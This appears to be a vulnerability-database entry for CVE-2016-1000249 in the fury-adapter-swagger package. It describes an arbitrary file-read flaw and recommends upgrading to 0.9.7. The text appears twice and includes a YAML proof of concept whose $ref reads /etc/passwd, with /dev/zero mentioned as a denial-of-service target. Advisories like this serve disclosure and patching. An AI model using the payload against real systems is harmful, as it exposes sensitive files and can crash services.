Fury Adapter Swagger
by Apiaryio
Source repositories
CVEs (1)
| CVE | Vendor / Product | Sev | Risk | CVSS | EPSS | KEV | Published | Description |
|---|---|---|---|---|---|---|---|---|
| CVE-2016-1000249 | hig | 0.38 | — | — | Sep 1, 2020 | `fury-adapter-swagger` from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like `/dev/zero`. ## Proof of Concept: ```yaml --- swagger: '2.0' info: title: Read local files version: '1.0' paths: /foo: get: responses: 200: description: Some description examples: text/html: example: $ref: '/etc/passwd' ``` ## Recommendation Upgrade to version 0.9.7 or later. |
- risk 0.38cvss —epss —
`fury-adapter-swagger` from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like `/dev/zero`. ## Proof of Concept: ```yaml --- swagger: '2.0' info: title: Read local files version: '1.0' paths: /foo: get: responses: 200: description: Some description examples: text/html: example: $ref: '/etc/passwd' ``` ## Recommendation Upgrade to version 0.9.7 or later.